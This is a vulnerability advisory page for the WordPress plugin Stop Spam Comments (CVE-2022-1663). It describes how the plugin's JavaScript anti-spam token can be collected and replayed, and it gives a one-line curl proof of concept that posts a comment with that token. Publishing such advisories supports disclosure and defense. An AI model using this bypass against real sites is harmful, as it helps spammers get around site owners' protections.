WordPress Plugin Vulnerabilities

Stop Spam Comments <= 0.2.1.2 - Access Token Bypass

Description

The plugin does not properly generate the Javascript access token for preventing abuse of comment section, allowing threat authors to easily collect the value and add it to the request.

Proof of Concept

Collect the name and value of ssc_key for the target post and use it on the request.

curl 'http://target.tld/wp-comments-post.php' -X POST --data-raw 'ssc_key_NAME=VALUE&comment=test&author=test&email=test%40test.tld&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0'

Affects Plugins

Plugin icon
stop-spam-comments
No known fix

References

CVE
CVE-2022-1663

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
30820be1-e96a-4ff6-b1ec-efda14069e70

Timeline

Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)

Other

Published
Title
Published
2018-12-13
Title
WordPress <= 5.0 - Authenticated Post Type Bypass
Published
2014-08-01
Title
blogVault 1.08 - Missing Account Empty Secret Key Generation
Published
2014-09-17
Title
WordPress Mobile Pack 1.0.8223 - 2.0.1 Password Protected Post Disclosure
Published
2015-07-13
Title
CP Image Store with Slideshow <= 1.0.6 - Purchase ID Brute Force Prevention
Published
2024-04-15
Title
Zero Spam < 5.5.7 - Spam Protection Bypass